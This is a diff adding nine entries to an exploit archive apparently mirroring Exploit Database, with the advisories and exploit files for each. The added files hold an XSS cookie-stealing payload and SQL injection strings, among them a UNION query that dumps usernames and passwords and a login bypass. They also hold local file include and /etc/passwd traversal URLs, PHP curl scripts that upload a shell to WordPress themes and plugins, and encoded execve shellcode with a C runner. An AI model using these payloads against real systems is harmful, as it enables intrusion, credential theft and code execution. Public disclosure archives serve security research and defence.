DB: 2015-06-30

9 new exploits

files.csv

@@ -33762,3 +33762,12 @@ id,file,description,date,author,platform,type,port
 37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component 'flash_upload.php' Arbitrary File Upload Vulnerability",2012-06-17,"Sammy FORGIT",php,webapps,0
 37411,platforms/php/webapps/37411.txt,"WordPress Organizer Plugin Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0
 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload Vulnerability",2012-06-16,"Sammy FORGIT",php,webapps,0
+37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component SQL Injection Vulnerability",2012-06-15,"Taurus Omar",php,webapps,0
+37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 Multiple SQL Injection Vulnerabilities",2012-06-16,JosS,php,webapps,0
+37415,platforms/php/webapps/37415.txt,"Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0
+37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
+37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
+37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
+37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
+37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
+37427,platforms/linux/shellcode/37427.txt,"encoded 64 bit execve shellcode",2015-06-29,"Bill Borskey",linux,shellcode,0

platforms/java/webapps/37416.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54049/info
+
+Squiz CMS is prone to multiple cross-site scripting vulnerabilities and an XML external entity injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers may exploit these issues to execute arbitrary code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to perform XML based attacks (including local file disclosure), TCP port scans, and a denial of service (DoS) condition; other attacks are also possible.
+
+Squiz CMS 4.6.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/_admin/?SQ_BACKEND_PAGE=main&backend_section=am&am_section=edit_asset"><script>alert(document.cookie)</script>&assetid=73&sq_asset_path=%2C1%2C73&sq_link_path=%2C0%2C74&asset_ei_screen=details [XSS] 

platforms/linux/shellcode/37427.txt

@@ -0,0 +1,40 @@
+/*
+Compile with: gcc -fno-stack-protector -z execstack
+This execve shellcode is encoded with 0xff and is for 64 bit linux.
+
+shell:     file format elf64-x86-64
+
+
+Disassembly of section .text:
+
+0000000000400080 <start>:
+  400080:=0948 b9 ff ff ff ff ff =09movabs rcx,0xffffffffffffffff
+  400087:=09ff ff ff=20
+  40008a:=0949 b8 ae b7 72 c3 db =09movabs r8,0xfffaf0dbc372b7ae
+  400091:=09f0 fa ff=20
+  400094:=0949 31 c8             =09xor    r8,rcx
+  400097:=0941 50                =09push   r8
+  400099:=0949 b8 d0 9d 96 91 d0 =09movabs r8,0x978cd0d091969dd0
+  4000a0:=09d0 8c 97=20
+  4000a3:=0949 31 c8             =09xor    r8,rcx
+  4000a6:=0941 50                =09push   r8
+  4000a8:=0949 b8 b7 ce 2d ad 4f =09movabs r8,0x46b7c44fad2dceb7
+  4000af:=09c4 b7 46=20
+  4000b2:=0949 31 c8             =09xor    r8,rcx
+  4000b5:=0941 50                =09push   r8
+  4000b7:=09ff e4                =09jmp    rsp
+
+2015 William Borskey
+
+*/
+char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4";
+
+int main(int argc, char **argv)
+{
+    int (*func)();
+    func = (int (*)()) shellcode;
+    (int)(*func)();
+     return 0;
+}
+
+

platforms/php/webapps/37413.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/54042/info
+
+The JCal Pro Calendar component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_jcalpro&Itemid=1 [SQL Injection] 

platforms/php/webapps/37414.txt

@@ -0,0 +1,73 @@
+source: http://www.securityfocus.com/bid/54043/info
+
+Simple Document Management System is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Simple Document Management System versions 1.1.5 and 2.0 are vulnerable. 
+
+-----------
+version 2.0
+-----------
+
+/list.php?folder_id=['foo]
+/detail.php?doc_id=['foo]
+
+<code>
+line 13: if(isset($_GET['folder_id'])) $folder_id = $_GET['folder_id'];
+         ...
+line 48: if(isset($order)) {
+         $query = "SELECT id,name FROM folders WHERE parent=$folder_id ORDER BY ". rawurldecode($order);
+         } else {
+         $query = "SELECT id,name FROM folders WHERE parent=$folder_id";
+         }
+</code>
+
+.xpl! :: /list.php?folder_id=-10+union+all+select+1,1,1,concat_ws(char(58),user,pass,name,email),1,1,1,1,1,1,0+from+users--
+
+
+~~ [Blind]
+
+/user_photo.php?view=[foo]
+
+<code>
+$query = "SELECT photo,mime FROM users_info WHERE id=".$_GET['view'];
+  $res = mysql_query($query, $sql);
+  if( mysql_num_rows($res) == 1 ) {
+    $row = mysql_fetch_array($res);
+    header( "Content-type: $row[mime]" );
+    echo "". base64_decode($row[photo]) ."";
+  } else {
+    echo "Badness!\n";
+  }
+</code>
+
+.poc! :: /user_photo.php?view=2+and+1=1
+         /user_photo.php?view=2+and+1=2
+
+
+-------------
+version 1.1.5
+-------------
+
+/login.php
+
+<code>
+  $result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'");
+  $row = @mysql_fetch_array($result);
+  if( $row[0] != 0 ) {
+      header("Location: index.php");
+      exit;
+  }
+
+  $result = @mysql_query("SELECT id,name FROM users WHERE user='$login'");
+  $row = @mysql_fetch_array($result);
+  $id = $row[id];
+  $name = $row[name];
+</code>
+
+.xpl! :: user: Admin
+         password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users --
+
+
+ __h0__

platforms/php/webapps/37415.txt

@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/54045/info
+
+Multiple Webify products are prone to multiple HTML-injection and local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to execute arbitrary HTML and script code in the context of the affected browser, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the web server process. Other attacks are also possible.
+
+The following Webify products are vulnerable:
+
+Webify eDownloads Cart
+Webify eDownloads
+Webify Project Manager
+Webify Blog 
+
+Local file include:
+
+http://www.example.com/index.php?page=[LOCAL FILE INCLUDE]
+
+http://www.example.com/admin/index.php?page=[LOCAL FILE INCLUDE]
+
+HTML injection:
+
+http://www.example.com/admin/index.php?page=query [Persistent Script Code Inject via Query Value]
+
+http://www.example.com/admin/index.php?page=addobjects [Persistent Script Code Inject via addObject name Value]
+
+http://www.example.com/admin/index.php?page=formdesigner [Persistent Script Code Inject via former label Value]
+
+http://www.example.com/admin/index.php?page=comments [Persistent Script Code Inject via Comment text & name Value]
+
+http://www.example.com/admin/index.php?page=submissions [Persistent Script Code Inject via submission name Value] 

platforms/php/webapps/37417.php

@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/54052/info
+
+Multiple Themes for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+WordPress Famous theme 2.0.5 and WordPress Deep Blue theme 1.9.2 are vulnerable. 
+
+<?php
+
+$uploadfile="lo.php";
+ 
+$ch = curl_init("http://www.example.com/wordpress/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php?folder=/wordpress/wp-content/themes/deep-blue/megaframe/megapanel/inc/&fileext=php");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+<?php
+
+$uploadfile="lo.php";
+ 
+$ch = curl_init("http://www.example.com/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/upload.php?folder=/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/&;fileext=php");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>

platforms/php/webapps/37418.php

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/54057/info
+
+LB Mixed Slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+LB Mixed Slideshow 1.0 is vulnerable; other versions may also be affected. 
+
+PostShell.php
+<?php
+
+$uploadfile="lo.php.gif";
+ 
+$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php?element_name=images&gid=1");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('images'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Shell Access : http://www.example.com/wordpress/wp-content/plugins/lb-mixed-slideshow/gallery/1/lo.php.gif
+
+lo.php.gif
+<?php
+phpinfo();
+?> 

platforms/php/webapps/37419.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54058/info
+
+Wp-ImageZoom for WordPress is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.
+
+Wp-ImageZoom 1.0.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/wp-imagezoom/download.php?file=../../../../../../../etc/passwd 

platforms/php/webapps/37420.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/54066/info
+
+VANA CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+ http://www.example.com/general/index.php?recordID=125'